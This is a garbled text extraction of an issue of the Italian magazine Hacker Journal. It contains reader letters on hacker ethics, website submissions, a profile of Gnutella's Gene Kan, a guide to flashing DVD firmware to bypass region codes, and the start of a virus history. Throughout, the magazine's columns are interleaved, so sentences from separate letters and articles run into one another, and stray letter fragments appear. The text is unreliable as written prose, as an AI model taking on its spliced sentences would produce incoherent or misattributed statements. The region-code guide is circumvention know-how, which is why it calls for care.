Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
er (hãk’∂r)
“Persona che si diverte ad esplorare i dettagli dei sistemi di programmazione
e come espandere le loro capacità, a differenza di molti utenti, che preferiscono
imparare solamente il minimo necessario.”
grand@hackerjournal.it
Boss: theguilty@hackerjournal.it
Publisher: ilcoccia@hackerjournal.it
Editor: grAnd@hackerjournal.it,
FACED!
Technical editor: caruso_cavallo@hackerjournal.it
Graphic designer: Marco Ranieri Esperia.it - http://basilicata.esperia.it DE
Contributors: Daniele Festa (cover picture)
Publishing company
4ever S.r.l.
Via Torino, 51
20063 Cernusco sul Naviglio
Fax +39/02.92.43.22.35
Printing
Stige (Torino)
Distributore
Parrini & C. S.PA. - 00187 Roma - Piazza
Colonna, 361- Tel. 06.69514.1 r.a./20134
Milano, via Cavriana, 14
Tel. 02.75417.1 r.a.
Pubblicazione quattordicinale registrata
FACED!
al Tribunale di Milano il 25/03/02
con il numero 190. IT Business Weekly - www.itbussinessweeklt.it
DE
Direttore responsabile: Luca Sprea
2 | www.hackerjournal.it
Questo spazio è vostro!
Approfittatene, e fate lavorare quella tastiera!
o
r em vo
Sa uo la
n
di dico ì
e d
OPEN SOURCE in iove sto!
G go
°a
29
Poca coerenza?
Salve HJ, seramente. Cambiando pagina, nello più lettori e almeno non dovete far
OPEN SOUR
CE vi scrivo a proposito del- stesso numero, altra mail: “Nel pro- “finta” di voler promuovere lo spirito
la lettera da voi pubbli- fondo blu”. Viene evidenziato un pas- hacker, che a mio avviso continuate,
cata sul numero 5 dal saggio: “...pensano agli hacker come n o n s e m p r e m a s p e s s o , a d i n f a n g a-
titolo “La sicurezza, delinquenti, che loro usano queste sfi- re... se sulla pagina numero due di
una toppa alla volta”. de solo perché vogliono fare qualcosa ogni numero ci sono i siti defacciati,
Credo che, nello spiri- di diverso e per dimostrare al mondo come diavolo volete che la gente pen-
to hacker, tale lettera intero che niente è veramente sicuro si bene degli hacker???? Ma questi
sia un isulto alla filo- c o m e s i d i c e ” . I n p i e n a c o n t r a p p o s i- sono solo pensieri di un vecchio geek
sofia che accomuna “i zione con la mail della pagina prece- trentenne, capisco che la rivista non si
veri hacker”. Almeno si dente. Non mi sembra che HCS!elKapo rivolge a persone come me, infatti
contrappone alla filosofia abbia voluto dimostrare altro che il quando qualcuno mi chiede perché
degli hacker definita nel “jar- fatto di aver potuto inviare a “sbafo” compro la vostra rivista gli rispondo
gon file”, universalmente riconosciuta 50*10^3 (cito testualmente) messaggi “per combattere il nemico bisogna co-
come “bibbia degli hacker”. SMS, se questo non è delinquere... Al- noscerlo...”.
Se l’autore della mail pubblicata vuo- tra pagina... credo che sia ottima la E2ule5
le essere un hacker avrebbe dovuto risposta data nella mail “Ah, dottore
segnalare il buco ai webmaster o agli dottore”, in vero spirito hacker... ma, Come abbiamo già avuto modo di dire,
amministratori del sistema, questo se la pensate davvero così sul softwa- Hacker Journal ha aperto una finestra
sempre secondo il jargon file. Il fatto re come mai ci sono i link ad astalavi- di carta su un mondo, quello dell’hac-
di non averlo fatto e, anzi, averne ap- sta sull’aritcolo “Effetti speciali? Li king, che ha le sue contraddizioni e le
profittato inviando (secondo quello faccio io” pagina 26 numero 3, con un sue divisioni. È abbastanza normale
che scrive) 50.000 messaggi ne fa un paragrafo dal titolo “Se li volete gra- quindi che la rivista rifletta in parte
cracker e della peggiore specie. Se tuiti”? Un po’ di coerenza non farebbe tutto questo. Certo, una linea editoria-
tutti rispettassimo un po’ più le rego- male... sempre IMHO. Forse chi scrive le ce l’ha, ed è quella che puoi legge-
le, le aziende che mettevano a dispo- gli articoli e chi risponde alle mail la re nelle risposte e negli articoli. Per
sizione i servivi gratuiti, come gli SMS pensano in modo un po’ troppo diver- quanto riguarda le lettere, noi pubbli-
v i a i n t e r n e t , f o r s e a v r e b b e r o c o n t i- samente, credo dobbiate rivedere un chiamo quelle che stimolano riflessio-
nuato a farlo (anche se ne dubito... ma po’ la vostra linea etica, IMHO. Certo, ni, come quella del numero scorso che
questa è un’altra storia). se diventate una rivista per “hacker” ti ha tanto colpito. E pubblichiamo vo-
Ma non è per questo che vi scrivo, non così come indicato nel jargon file, lentieri la tua, sperando che faccia ri-
credo non ci sia nulla di male per una molti script kiddie, che tanto sono flettere qualcuno, che ci scriverà la
persona trovare una falla in qualche maltrattati a parole nella vostra rivi- sua interpretazione che genererà...
sito e approfittarne, vantandonese sta, ma tanto rifocillati da link utili da eccetera. Questa è una piazza dove si
con gli amici per fare il figo. Sempli- dove scaricare Warez e exploit, non fanno riflessioni pubbliche, dove le
cemente quella persona non è un hac- compreranno più la vostra rivista, for- p e r s o n e p o s s a n o f o r m a r s i u n ’ o p i n i o-
ker. Avreste, se vi ritenete una rivista zandovi a dover introdurre la pubbli- ne, cambiare punto di vista, e magari
per hacker, dovuto sottolinearlo, IM- cità (tanto odiata, anche se non capi- passare da una parte all’altra. Forse
HO naturalmente. Criticare pubblica- sco perché? tanto non credo che Mi- qualcuno che comincia con gli exploit
mente un sistema e non parlarne di- crosoft o Symantech vorrebbero fare si rende conto che non è poi ‘sta gran
rettamente con i responsabili non gio- la pubblicità sulla vostra rivista...). cosa, e gli viene voglia di diventare
va a nessuno, prima fra tutti alla co- Almeno però ci sarebbe un po’ più di un hacker vero. Se però etichettiamo
munità hacker che già gode di una coerenza tra quello che vi proponete subito buoni e cattivi, decidendo di
pessima reputazione nell’opinione di fare e cosa alla fine invece fate.In parlare solo ai primi, perdiamo tutti
pubblica. Se vi ritenete una rivista che ultima analisi, seguirei il consiglio questa possibilità.
vuole far conoscere al pubblico lo spi- datovi dalla lettrice Irene108 sempre ...Ah, secondo me HCS!elKapo stava
rito trainante degli hacker, con questa sul numero 5, cambiate il nome in un po’ esagerando quando parlava di
email avete, sempre IMHO, fallito mi- “cracker journal” credo avrete ancora 50*10^3 SMS.
www.hackerjournal.it |3
www.hackerjournal.it
mailto:
redazione@hackerjournal.it
COMPILATORI GRATIS
ono un appassionato (inesperto)
S di programmazione Object Ori-
ented, e ho bisogno di un vostro
consiglio: mi sapreste indicare un
sito (sicuro) da cui scaricare gratui-
tamente un buon editor (provvisto
di compilatore) per il linguaggio
C/C++? Ve ne sarei infinitamente
grato! Tenete però presente che uti-
lizzo come SO Windows 98 e ME!
So che dovrei passare a Linux, ma
qui sorge un secondo problema: ho
appena installato su una partizione
del mio hard disk la distro 8.2 di
Mandrake, ma non appena questa
entra nella schermata iniziale il mio
(piuttosto vecchio) monitor viene Continuate a mandarci le vostre immagini: questa è di FXM (Gianni),
messo in stand-by! È possibile risol- che ha esagerato un po’, mandando un Tiff da 10 Mega. (Gianni, un
vere anche questo problema? Gra- Jpeg per questo tipo di cose va benissimo, e pesa mooolto meno).
zie!
Christi@n
a occhio sembrerebbe trattarsi di un parti più generali e discorsive, men-
Alcuni vecchi compilatori Borland problema di configurazione di tre metteremo sul sito gli esempi di
sono ora gratuiti! Non saranno i più XFree86, che probabilmente cerca codice, così si possono scaricare o
aggiornati, ma sono affidabili, do- di impostare una risoluzione o una copiare senza doverli trascrivere
cumentati e gratuiti. Li puoi trovare frequenza di refresh non supportate (con in più il rischio di errori).
all’indirizzo: dal monitor. Senza poterci mettere
http://community.borland.com/mu- le mani sopra, è è però difficile fare CANOTTIERE E CELLULARI
seum Per scaricarli è necessaria una diagnosi affidabili. Mi spiace, non alve ragazzi, vi scrivo questa e-
registrazione gratuita.
Per quanto riguarda il malfunziona-
riesco ad aiutarti di più. S mail per farvi una domanda e
una richiesta. Perché il pupazzo di-
mento del monitor con la Mandrake, SECRET ZONE PIÙ RICCA! segnato nella 4 copertina del gior-
iao sono dArKcLoWn, volevo nale ha il segno
CREW IN CERCA DI NUOVI MEMBRI C chiederevi di prendere almeno
in considerazione questa mia pro-
della abbronza-
tura della canot-
Salve, posta: perché non usate la secret tiera???Non è
vi abbiamo già scritto per farvi i zone come fonte principale dei no- che potete accen-
complimenti sul fatto che migliorate stri tanti richiesti corsi di linguaggi nare come trova-
in ogni nuovo numero, questa volta di programmazione E il giornale lo re la posizione di
per chiedervi di inserire l’indirizzo lasciamo com’è. Scommetto che i un cellulare? Vi
della Crew su HJ. lettori aumenteranno notevolmente. allego un teschio
Vi chiediamo di inserire il link perché ¥dArKcLoWn¥ in Ascii.
stiamo cercando nuovi membri e septar
nuovi collaboratori per completare Come forse avrei visto, la secret zo-
alcune sezioni del sito. ne del sito è sempre più ricca, e in Io quando non trovo la posizione
Il sito non è ancora on-line, ma cmq effetti già pensavamo di spostare lì del mio telefonino faccio così: col
l’indirizzo è www.epochcrew.cjb.net alcuni degli articoli che non trovano telefono di casa compongo il nume-
l’e-mail per chi volesse parteciapare posto nella rivista. Probabilmente ro del cellulare, e poi cerco di loca-
alla creazione del sito è per quanto riguarda la programma- lizzarlo seguendo la suoneria. Ge-
epochcrew@hotmail.com. zione, lasceremo sul giornale le neralmente lo trovo sotto ai cuscini
4 | www.hackerjournal.it
A
o STAMP
LIBERAITÀ
r em vo
Sa uo la
n
di dico ì C
e d
in iove sto!
G go
NO PINUFBOBRLMIAZIONI
°a SOLO ARTICOLI
29 E
www.hackerjournal.it |5
www.hackerjournal.it
e abbonamenti
by
e to” gli attacchi contro siti pedofili,
Per quanto riguarda la password, noi contro lo strapotere (ed anti-privacy)
l’abbiamo sempre azzeccata. A non della Microsoft, etc... Ora so distin- Siete in tanti a chiederci se sia possibile ab-
azzeccarla a volte sono stati i lettori, guere le categorie e comprendere bonarsi o richiedere i numeri arretrati di
che spesso e volentieri confondevano che gli idioti sono ovunque. E sono Hacker Journal, che ormai stanno diventan-
l (elle) con 1 (uno) o 0 (zero) con O felice che finalmente ci sia anche un do oggetti da collezione. Stiamo cercando di
(vocale o). Per tagliare la testa al to- posto per questi argomenti fra le allestire le strutture necessarie, ma potreb-
ro, abbiamo deciso di non utilizzare tante riviste in edicola. Mi chiedevo be essere necessario un po' di tempo. Intan-
più caratteri ambigui nello scegliere se fosse possibile reperire i primi 2 to, potete trovare i PDF di tutti i vecchi nu-
le nuove password. Precisiamo anco- numeri che mi sono sfuggiti, perchè meri sul sito nella Secret Zone, e già che sie-
ra una volta che, quando esce il nuo- ho deciso di diventare un vostro let- te sul sito, iscrivetevi alla nostra mailing list:
vo numero della rivista, le password tore abituale. sarete avvisati non appena i servizi abbo-
associate al vecchio numero cessano Francesco “Squalo” namenti e arretrati saranno disponibili.
di funzionare.
Tieni comunque presente che attac-
LA MADRE DEI LAMER È care il server di un altro è un reato,
SEMPRE INCINTA anche se questo è “cattivo”. E per di
i presento: mi chiamo Francesco più spesso non serve a niente. Se in-
M “Squalo”, ho 27 anni e vivo a
Latina. Oggi, in una sperduta edico-
vece di attaccare frontalmente e bru-
talmente i server Web di Microsoft la
la della mia città, ho trovato il n.3 gente si impegnasse a dimostrarne
della vs rivista. Inizialmente ho pen- teoricamente le vulnerabilità e a pro-
sato ad un nome ingannevole ma, pagandare le soluzioni alternative
sfogliandola, ho scoperto che il no- (software libero sopra tutte), il dan-
me era coerente con il contenuto. E no per Microsoft sarebbe molto mag-
6 | www.hackerjournal.it
A
STAMP
r
o
em vo
Sa uo la
LIBERAITÀ
C
n
di dico ì
e d
NOOPINUFBOBRLMIAZIONI
in iove sto! L
SO L OLI
G go E ARTIC
°a
29
www.hackerjournal.it |7
news
HOT! ! APPLE TRA APPLAUSI E FISCHI
8 | www.hackerjournal.it
news
www.hackerjournal.it |9
HJ ha surfato per voi...
I classici 15 minuti di celebrità! Questi sono i vostri
della Rete
www.autistici.org
Nel manifesto del sito si legge “Per
iniziare, vogliamo tutto. Socializza-
re saperi, senza fondare poteri”.
Insieme al progetto gemello
www.inventati.org, il sito si propo-
ne di supportare il diritto alla co-
municazione, alla privacy e all’a-
nonimato, e di facilitare lo scambio
delle proprie conoscenze e risorse.
Per questo, allestisce strumenti e
risorse come caselle di posta “sicu-
re”, remailer anonimo, proxy, new- www.theblackwindow.6go.net
sgroup, e anche un nodo Freenet.
Se decidete di usare qualcuno dei Vorrei promuovere il mio sito hacker, è molto ricco di cose inte-
servizi, non dimenticate di passare ressanti riguardanti l’hacking....perfavore visitatelo.
dalla pagina “Manifesto”, dove
Alessandro
troverete le coordinate per effet-
tuare una donazione per sostenere
il progetto.
by
by
e
www.fuckinworld.org www.pirati.tk
www.gnomixland.com
Gnomix è un po’ come una vecchia
soffitta dove c’è di tutto, ma biso- Vi volevo segnalare quest’ot- Saluto tutto lo staff di hac-
gna saperlo trovare. C’è molto ma- kerjournal...avete fatto un
teriale relativo all’hacking, ma an- timo sito, per favore segnate- sito “SUPER” spero che cre-
che raccolte di link sugli argomen- lo nei vostri link, ne vale la sca sempre di più...vi scrivo
ti più vari (Mp3, sfondi scrivania,
pena. C’è di tutto, anche un questa email perchè volevo
avvenenti modelle e gli immanca-
bili loghi e suonerie). Cercando forum frequentatissimo: segnalarvi il mio sito e il sito
cercando, qualche chicca salta fuo- di tutti i miei collaboratori:
ri, anche se alcune scatole non PiratesZone
contengono quello che ci si aspetta Alex De Large
(per ovvi motivi, i link morti sono
una costante nei siti di hacking).
10 | www.hackerjournal.it
e
lat :
g na siti a
Se tri @
e l.it
os on
i v dazi urna
re erjo
ck
ha
http://slashdot.org
Se in rete succede qualcosa che fa
http://clanost.interfree.it www.hackernet.tk rumore, state pur sicuri che su
slashdot se ne parla. Partito come
Ciao sono webmaster del sito Salve carissima redazione di sito di informazioni con commenti,
del Clan OST. Siamo una slashdot è riuscito a conquistarsi
Hacker Journal, se potete, un gran numero di utenti tra i più
neonata crew vi chiedo di se- inseritemi tra i vostri link, qualificati: tecno guru, amministra-
gnalare il sito su HJ speran- così potrei diffondere meglio tori, dirigenti, sviluppatori softwa-
do di ampliare la crew. Ci ri- la cultura hack. re, e hacker “veri”, quelli che non
uniamo in chat ogni sera al- Grazie in anticipo. hanno bisogno di dichiararlo. Ogni
le 21:30. giorno questo “popolo digitale” si
HackerNet collega, sfoglia le notizie ma so-
VladKazama prattutto le commenta, con una
competenza rara. Slashdot è così
orientato verso il software libero
che tutto il software che gestisce il
sito è open source e liberamente
scaricabile.
http://ildp.pluto.linux.it
Cercate documentazione su Linux
in Italiano? Smettete pure di cerca-
re e andate a questa pagina del
Pluto Linux User Groups. Si tratta
http://digilander.libero.it/System_BuG infatti della pagina ufficiale dell’I-
talian Linux Documentation Pro-
Innanzi tutto vi devo fare i miei complimenti sulla rivista dato che è ject, e anche se il nome è inglese,
molto bella. L’unica cosa che non mi piace molto sono tutte quelle im- contiene tutta la documentazione
magini di teschi e le copertine. Cmq a parte questo siete davvero fan- italiana esistente sul sistema
GNU/LInux: manuali, howto, gui-
tastici!!!! Ora detto quello che volevo dire passo a segnalarvi l’url del de, tutorial e chi più ne ha più ne
mio sito e spero che lo metterete nei vostri link!!!! metta. Risalendo di un ramo l’al-
Grazie!!!! Ciao. bero della directory, si trova il Plu-
[*°System_BuG°*] to, uno dei più antichi e numerosi
gruppi di utenti Linux.
www.hackerjournal.it |11
personaggio
G
sono la possibilità di ene Kan, considerato il porta- trale. Un pericolo di cui sbarazzarsi al più
condividere file di qualsiasi voce del gruppo che ha contri- presto: la sezione relativa a Gnutella del si-
tipo, e il fatto di non buito allo sviluppo e alla diffu- to di NullSoft è stata quindi chiusa nel giro
dipendere da un’unico ente, sione di Gnutella, è morto suici- di poche ore, per ordini ricevuti dall’alto.
azienda o server centrale, che da nella sua casa di San Mateo Ma era già troppo tardi. Tra gli “errori”
può essere attaccato dalle case in California. Un po’ perché se compiuti dal team di sviluppo (errori dal
di produzione così come è lo meritava, un po’ per chiarire alcune ine- punto di vista di AOL, s’intende), ve ne è
avvenuto per Napster e Audio sattezze rimbalzate sulla rete, gli dedichia- stato uno gravissimo. Pur se per poche ore,
Galaxy. Lo svantaggio è che la mo questo spazio. Gnutella era stato pubblicato come softwa-
rete Gnutella è molto più re Open Source, e quindi erano disponibili
frammentata: è però possibile >> La vera storia di anche i codici sorgenti. Il vaso di pandora
che cercando un file non lo si era stato aperto, e non c’era alcun modo di
riesca a trovare, anche se Gnutella richiuderlo.
questo è presente sull’hard
disk di un altro utente Pochi ricordano che Gnutella, uno dei pro- >> L’apporto di Gene
Gnutella. Il sistema prevede tocolli più rivoluzionari della rete, per le
infatti la presenza di tante sue caratteristiche di decentralizzazione
sotto reti, formate da nodi della condivisione dei file, è stato partorito Proprio basandosi sui sorgenti della prima
vicini tra di loro. Solo in seno alla più grande multinazionale che versione di Gnutella, Gene Kan e altri pro-
all’interno di una sottorete opera nel settore di Internet e della produ- grammatori hanno potuto mettere a punto
c’è un’alta probabilità di zione artistica e musicale, AOL/Time War- il protocollo e i software necessari, conti-
trovare effettivamente il file ner. Il progetto è infatti stato concepito dal nuando ovviamente a lasciare libero il co-
cercato in tempi ragionevoli. gruppo di programmatori di NullSoft, dice per ulteriori sviluppi. Per le sue qualità,
azienda che aveva già rilasciato program- Gene è stato scelto come portavoce del
www.gnutella.com mi innovativi come WinAmp e ShoutCast, gruppo, ed era lui ad apparire in interviste
Principale sito rispettivamente per la riproduzione/codifi- e programmi Tv, così come a conferenze
sul protocollo e ca di file Mp3 e per la loro diffusione in pubbliche e premiazioni. Anche per que-
i vari progammi. streaming su Internet. Nel maggio del sto, alla notizia della sua morte, molti titoli
1999 NullSoft è stata acquisita da si riferivano a lui come al “padre di Gnu-
www.bearshare.com AOL per 70 milioni di dollari. Cifra tella”, sovrastimando probabilmente il suo
Popolare client che, che anche nel periodo delle vacche ruolo nella creazione del protocollo. Que-
per Windows, recentemente grasse di Internet, non era certo da sotto- sto non significa però che Gene fosse solo
biasimato per l’impiego di valutare. Si può quindi immaginare con una persona “tutta immagine e poca so-
Spyware. quanta sorpresa i vertici di AOL/Time War- stanza”. Oltre a occuparsi dello svilup-
ner abbiano reagito quando, nel marzo po di Gnutella, ha infatti fondato In-
http://gtk- 2000 hanno scoperto che i ragazzotti che fraSearch, azienda che si occupava di
gnutella.sourceforge.net si erano appena portati in casa avevano ri- sviluppare un motore di ricerca per reti
Client grafico per qualsiasi lasciato un protocollo e un programma peer to peer. La società è stata in seguito
Unix che supporti le librerie che minacciava di minare fin dalle fonda- acquisita da Sun Microsystems, e Gene
GTK+ (in versione 1.2 o menta alcune delle attività più redditizie stesso è passato alle dipendenze della
superiore). del gruppo: la produzione musicale e cine- mamma di Java. Negli ultimi mesi, Gene
matografica. Gnutella permetteva in- lavorava infatti al progetto JXTA, col quale
www.limewire.com fatti di condividere file di qualsiasi Sun Microsystems vuole portare il concetto
Client scritto in Java, funziona tipo, Mp3 e video compresi, senza del peer to peer sugli accessori più svariati
con Windows, Mac e Unix. alcuna possibilità di controllo cen- (computer, telefoni, palmari eccetera). K
12 | www.hackerjournal.it
VideoHack
>>
COME MODIFICARE IL CODICE REGIONALE DEI DVD
N
Di tutte le limitazioni all’uti-
lizzo di un DVD Video impo-
ste dalle case di produzio-
ne, la più odiosa e appa-
rentemente insulsa è quella
che riguarda la zona geo-
grafica in cui è possibile vedere il film.
Alla faccia del libero mercato e della li-
bera circolazione della cultura, le ma-
jors di Hollywood hanno suddivi-
so il mondo in sei aree geografi-
che; i lettori DVD venduti in ogni
area non possono utilizzare i DVD
venduti nelle altre cinque zone. Se
chiedete loro il perché di questa scelta,
li sentirete bofonchiare qualcosa ri-
guardo alla necessità di frenare la pi-
rateria e cose simili, ma il vero punto è La mappa dell’impero digitale delle case di produzione cinematografica.
che le majors vogliono poter deci- Mai come in questi casi, è stato azzeccato il motto “Di-Vi-Di èt impera”.
dere quando e come (se non ad-
dirittura “se”) un certo film deve un computer, dal software di riprodu- aumentato di uno. Quando il con-
essere visto dagli abitanti di una zione o dal sistema operativo). È evi- tatore arriva a 5, la zona non è
certa regione. Questo permette loro dente che, se si tratta di un’impostazio- più modificabile se non da un centro
per esempio di proiettare un film nelle ne software, questa può essere modifi- di assistenza del produttore. Anche
sale europee mesi dopo la sua uscita cata a piacimento, e –proprio come ac- produttore però ha a disposizione un
negli Stati Uniti, senza che gli spettato- cade con i codici per le gabole dei vi- numero limitato di “azzeramenti” del
ri europei abbiano già visto il DVD, deogiochi– su Internet hanno comin- contatore; esauriti questi, il DVD è
magari acquistato per posta proprio ciato a circolare le sequenze di tasti da bloccato per sempre su una zona.
negli USA. pigiare sul telecomando del DVD per
Bisogna notare che non è assoluta- modificare la zona impostata (per i let- >> Fatta la legge trovato
mente vietato acquistare un letto- tori DVD-ROM montati sui PC, esistono
re di DVD americano, africano o dei programmini che permettono di fa- l’inganno!
giapponese per poter vedere i re la stessa cosa).
film venduti in quelle zone. Il do- Sul finire degli anni 90 però, annusata Anche in questo caso però, non è stato
ver comprare sei diversi lettori per po- l’aria che tirava, le majors hanno im- modificato l’hardware del lettore, ma
ter vedere qualsiasi DVD regolarmente posto un’ulteriore limitazione ai pro- solo il suo software: i lettori RPC2 sono
acquistato e pagato, ci pare però una duttori di DVD: per poter ottenere dal uguali a quelli RPC1 ma hanno un di-
richiesta un po’ troppo esosa. DVD Forum le chiavi per decifrare i fil- verso firmware (il software registrato in
mati, i produttori dovevano impegnarsi memorie non volatili, necessario al
a supportare una nuova tecnologia di funzionamento interno di un apparec-
>> Come Funziona la protezione, chiamata RPC2, che limi- chio). Quindi, se è possibile sosti-
Protezione tasse la possibilità di modificare l’area tuire il firmware conforme alle
geografica del lettore in questione. Il specifiche RPC2 con quello prece-
Di uno stesso film, viene prodotto un sistema RPC2, diventato obbligatorio a dente, RPC1, si può avere un let-
DVD con una codifica differente per partire dal primo gennaio 2000, è un tore di DVD che non si blocca do-
ogni regione. Inizialmente, i lettori di po’ più sofisticato, ed è implementato po cinque modifiche della zona.
DVD (nel senso di “meccanica” del let- nel lettore stesso; in ogni lettore DVD Manco a dirlo, sostituire il firmware
tore) erano in grado di leggere i dischi che utilizza questo sistema è presente RPC2 con la precedente versione RPC1
di qualsiasi zona, e gli eventuali con- un contatore. Ogni volta che si mo- è possibile, e nemmeno troppo compli-
trolli venivano fatti a valle (nel caso di difica la zona, il contatore viene cato. Su Internet si trovano collezioni di
13| www.hackerjournal.it
VideoHack
4
versione giusta del firmware. Se il lettore non è “region
free”, occorre fare in modo
che lo diventi.
>> All’opera Dopo aver verificato marca e
video (lettore hardware) o se viene effet- modello esatti, andate all’in-
Prima che vi accingiate a fare qualsiasi tuata da un programma (via software). dirizzo http://digital-digest.com/
cosa con il vostro lettore DVD, voglia- Se il lettore è impostato su una zona spe- dvd/downloads/firmware.html o
mo avvisarvi che la modifica del cifica, passate al punto 4. sul sito www.firmware.fr.st e scarica-
firmware è sempre un’operazione te il file corrispondente. Per flashare
2
delicata: se qualcosa dovesse andare Se la decodifica avviene (installare) il firmwa-
storto durante l’operazione (se salta la via software, l’impostazione re, potrebbe es-
corrente, si impalla il computer o il file regionale può essere bypassa- sere necessario
del firmware scaricato da Internet fosse ta usando programmi come scaricare anche
corrotto), il lettore di DVD potrebbe Dvd Genie (www.inmatrix.com) o Dvd un’utility, che sa-
diventare inutilizzabile, e solo il Region Killer (http://digital-digest.com rà indicata nella
centro di assistenza potrebbe ripararlo. /dvd/ downloads/dvdrk.html), senza pagina in que-
La modifica al firmware inoltre invali- preoccuparsi di altro, e impostare la stione). Non tutti i
da la garanzia; se il lettore è stato regione 0. lettori possono
acquistato da poco, pensateci due vol- essere resi “re-
3
te prima di rinunciare a un lungo pe- Se la decodifica avviene via gion free”; se il vo-
riodo di garanzia e supporto gratuito. hardware, e il disco è “region stro non fosse nella
free”, bisogna usare dei lista, non ci sono soluzioni facilmente
1
Come prima cosa, bisogna programmi che permet- praticabili (bisognerebbe cioè copiare
ottenere informazioni sul tano di cambiare le impostazioni ogni singolo supporto
proprio lettore di DVD. di zona della scheda video senza DVD, eliminando la co-
Questa operazione può essere aumentare il contatore. Questi pro- difica regionale).
svolta con un programma come
CDVDInfo (http://digital-digest.com/
dvd/downloads/cdvdinfo.html). Se il I MAC E IL
programma rivela che il lettore REGION CODE
è “region free”, rimane da de-
terminare se la decodifica av- Tutte le cose dette per quanto ri-
A
viene nella guarda Windows valgono anche
scheda per Mac, con un’ovvia eccezione: i
programmi citati sono solo per
Windows. Niente paura: anche per
Mac (Classico e OS X) esiste tutta
l’attrezzatura necessaria per libe-
rare il proprio lettore di DVD. Tut-
te le informazioni, gli strumenti
necessari e le patch per il firmwa-
re dei lettori DVD si possono facil-
mente trovare su Internet. Uno dei
siti migliori è The Mac DVD Re-
source, che si trova all’indirizzo
www.wormintheapple.gr/macdvd.
14| www.hackerjournal.it
>>
PILLOLE
5 6
Dopo aver scaricato il firm- Dopo aver cambiato le impo-
ware ed eventualmente il stazioni hardware o software,
programma per la sua in- conviene far riconoscere nuo-
stallazione, procedete al- vamente il lettore DVD a Win- RCE,L’ULTIMA TROVATA
l’aggiornamento (anzi, all’invecchia- dows (che conserverà altri-
mento), avendo cura menti le impostazioni precedenti, impe- DELLE MAJORS
di lavorare in con- dendo comunque la visualizzazione di
dizioni di massi- DVD di aree diverse). Se tutto è andato Consapevoli del fatto
1
ma sicurezza: leg- come dovrebbe, potrete a questo punto che i lettori possono es-
gete tutte le istru- vedervi il vostro film preferito in- sere taroccati (e che in
zioni che trovate, dipendentemente dall’a- certi casi vengono addi-
uscite da tutti i rea geografica per rittura venduti già come
programmi, e se cui è stato prodotto. “region free”, per esem-
c’è un tempora- Ricordiamo ancora pio da www.zone-
le, forse è meglio una volta che l’ope- freedvd.com), la Mo-
che rimandate l’operazio- razione è perfetta- tion Picture Association
ne. Un inconveniente a que- mente legale, ma ren- of American (MPAA) ha
sto punto renderà inutilizzabile il de nulla la garanzia del sviluppato un nuovo si-
vostro lettore. lettore. K stema, chiama-
PER I LETTORI DA
to RCE (Regional
Code Enhan-
cing), che impe-
2
TAVOLO disce la visua-
lizzazione del DVD
Con i lettori DVD da tavolo (quelli da Video sui lettori “re-
collegare alla TV, come un videoregi- gion free”. L’unico mo-
stratore) ovvimente non è possibile met- do per aggirare la prote-
tersi a pistolare con dei programmi per zione è quello di impo-
carpire le informazioni sulla meccanica stare la zona prima di in-
3
ed eventualmente flashare il firmware, serire il DVD, ma questo
ma non tutto è perduto. Per risparmiare, ovviamente può essere
i lettori DVD da tavolo vengono prodotti fatto solo con i lettori
tutti uguali, e poi viene impostato il codi- RPC-1. In caso contra-
ce regionale in qualche modo. In molti casi è quindi possibile modificare questa rio, dopo cinque cambi
impostazione di volta in volta, o addirittura rendere il lettore “region free”. A volte di zona il lettore si bloc-
può essere necessario aprire il lettore e spostare un interruttore o un jumper, mol- cherà sull’ultima regione
to spesso basta digitare una particolare combinazione di tasti sul telecomando. In impostata. Attualmente
certi casi non c’è nulla da fare: l’operazione può essere fatta solo da un centro di l’RCE è implementato
assistenza. La situazione varia da marca a marca, e da modello a modello. Al so- solo sui DVD prodotti
4
lito, Internet si rivela una fonte inesauribile di informazione, Ecco un paio di siti da per la zona 1 (USA),
non perdere: e non si sa se verrà ap-
plicato anche altrove.
VCDHelp - DVD Player Hacks
www.vcdhelp.com/dvdplayershack.php
Una lista piuttosto nutrita di modelli, ma i trucchi non sempre funzionano. Usateli
AREA ZERO
con cautela. NELLO SPAZIO
DVD Reviewer - Multi Region Hacks Già da un paio di anni,
www.dvd.reviewer.co.uk/info/multiregion sulla stazione spaziale
Essendo un sito inglese, ha il pregio di elencare molti lettori con le sigle con cui sono internazionale sono stati
5
venduti in Europa (spesso diverse da quelle degli stes si lettori negli USA). installati due lettori di
DVD con area code
uguale a zero. Orbitan-
do attorno alla terra, la
piattaforma infatti
non rientra in alcuna
delle zone previste.
La mano lunga delle
multinazionali dell'intrat-
tenimento non può arri-
vare fin lassù.
6
www.hackerjournal.it |15
Virus
Virus: il fenomeno
Una breve storia di uno dei fenomeni più devastanti del lato oscuro
I
nome VIRUS deriva dal fat- prodotti, cioè chi aveva creato il virus
to che tali programmi si au- più potente. Nel 1970 nasce
toreplicano e sono quindi Creeper. Si tratta di un vi-
costretti ad attaccarsi ad un rus creato da Bob Tho-
altro programma. In pratica la stessa cosa mas diffuso nella
che farebbe un virus biologico, che per in- rete ARPAnet. Il
fettare, replicarsi e vivere nel nostro orga- virus si presen-
nismo ha bisogno di una cellula. tava scrivendo a
I virus sono solitamente scritti da abili pro- video “I’m
grammatori, ma in Rete sì trovano ap- Creeper, catch
plicazioni che consentono, anche ai me if you can!”.
meno esperti di creare un virus com- Negli anni 80
plesso con pochi clic. nasce il primo Ca- svol-
Alcuni virus sono scritti solo per la voglia vallo di Troia. Un ta. Inizia-
del programmatore di mettersi alla prova, programmatore creò una rono ad ap-
di “vedere se ne è capace” o di dimostra- versione di un famoso gioco parire i primi
re al mondo la loro bravura. Altri non so- chiamato Animal, che durante virus capaci di
no che uno scherzo. A volte intendono in- l’esecuzione si riproduceva an- sfruttare le debolezze
viare un messaggio di protesta o d’altro dandosi a porre in tutti i sistemi di questo sistema opera-
genere. In realtà, solo pochi virus sono collegati. Lo scopo del programmatore tivo.
scritti con lo scopo di provocare danni. era di diffondere un nuovo metodo di dis- Una vera e propria rivoluzione
tribuzione del software chiamato “Pervasi- avvenne quando si presentò una
>> La storia dei Virus ve Release”. Quel tipo di programma pre- minaccia quasi del tutto inattesa: quella
se il nome di “cavallo di Troia” per indica- dei virus macro. La prima infezione di
informatici re che conteneva al suo interno un agente questo tipo ad entrare in libera circolazio-
infettivo ne fu Word.Concept, che usava il lin-
La storia di questo fenomeno nasce con Nel 1985 in Italia nasce Ping Pong, guaggio di programmazione di Microsoft
l’inizio stesso dell’informatica: un virus che simpaticamente faceva com- Word. Siccome lo stesso linguaggio di
Nel 1959 tre programmatori dei Bell parire sullo schermo una pallina, la quale scripting viene usato anche da altri pro-
